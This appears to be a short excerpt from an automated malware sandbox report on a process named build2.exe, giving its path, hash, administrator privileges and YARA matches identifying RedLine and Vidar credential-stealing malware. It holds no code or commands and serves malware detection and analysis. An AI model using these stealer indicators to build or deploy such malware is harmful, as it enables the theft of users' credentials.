Commandline:	"C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe"
Imagebase:	0x7ff6d64d0000
File size:	296'448 bytes
MD5 hash:	A04031208441077A014F42095FF86107
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2111904920.0000000001AFE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true